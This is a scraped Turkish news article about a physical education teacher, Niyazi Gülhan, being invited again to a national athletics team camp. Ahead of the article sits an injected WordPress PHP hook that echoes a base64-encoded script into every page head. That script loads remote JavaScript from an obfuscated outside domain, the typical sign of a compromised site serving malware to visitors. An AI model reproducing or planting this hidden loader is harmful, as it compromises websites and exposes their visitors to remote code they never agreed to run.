function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); Beden Eğitimi Öğretmeni Tekrar Milli Takıma Davet Edildi – Besyo Hakkında Güncel Bilgiler

Beden Eğitimi Öğretmeni Tekrar Milli Takıma Davet Edildi

30 Nisan 2014
Genel
0 0

Balıkesir’in Erdek ilçesinden daha önce Türkiye Atletizm Federasyonu tarafından 4. Uluslararası Rumi Çocuk Spor Oyunları için sporcusu Aleyna Çakmak ile milli takıma davet edilen 18 Eylül Ortaokulu beden eğitimi öğretmeni ve Milli Takım Antrenörü Niyazi Gülhan’a ikinci kez milli davet geldi.

Niyazi Gülhan, İşitme Engelliler Federasyonu Başkanlığı tarafından 1-30 Mayıs 2014 tarihleri arasında Trabzon’da yapılacak olan milli takım kampına davet edildi. Kendisine yapılan davete olumlu cevap veren Gülhan, en az bir milli sporcu yetiştirme hayali olduğunu, bu hayalini de Aleyna Çakmak ile gerçekleştirdiğini belirterek, “Bir diğer hedefim ise milli takım antrenörü olmaktı, bu da gerçekleşti. Milli takım kafilesine antrenör olarak davet edildim. Avrupa Şampiyonası’na hazırlık kampına davet edilmek benim için çok önemli. Kendimi sürekli geliştirip ülkeme daha faydalı olmaya çalışıyorum. 2-3-4 Mayıs 2014 tarihlerinde İzmir’de Okullarası Atletizm Grup-Bölge Şampiyonluğu, 9-10-11 Mayıs tarihlerinde ise Eskişehir’de Türkiye Kulüplerarası Yıldızlar Ligi yarışları olacağından dolayı milli takım kampına 10 gün geç katılacağım” dedi.

Kaynak: IHA

0

Bir Cevap Yazın

Menü